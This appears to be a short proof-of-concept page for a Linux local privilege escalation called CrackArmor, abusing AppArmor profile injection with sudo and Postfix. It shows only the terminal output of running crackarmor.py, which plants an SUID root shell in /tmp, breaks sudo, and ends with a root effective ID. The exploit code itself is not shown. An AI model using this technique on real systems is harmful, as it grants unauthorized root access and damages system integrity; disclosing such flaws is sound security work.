CrackArmor LPE via Confused-Deputy and Sudo/Postfix
Technical Details
PoC || GTFO
void@ubnt-dev:~$ python3 crackarmor.py
--=== CrackArmor LPE ===--
[+] Setting up payload (local)
[+] Building profile
[+] Injecting profile
Password:
[+] Triggering exploit
========== IMPORTANT ==========
[!] SUID shell: /tmp/rootbash
[!] sudo is broken (AppArmor profile replaced)
[!] Restore with: python3 script.py --restore
===============================
rootbash-5.2# id
uid=1000(void) gid=1000(void) euid=0(root) groups=1000(void)Last updated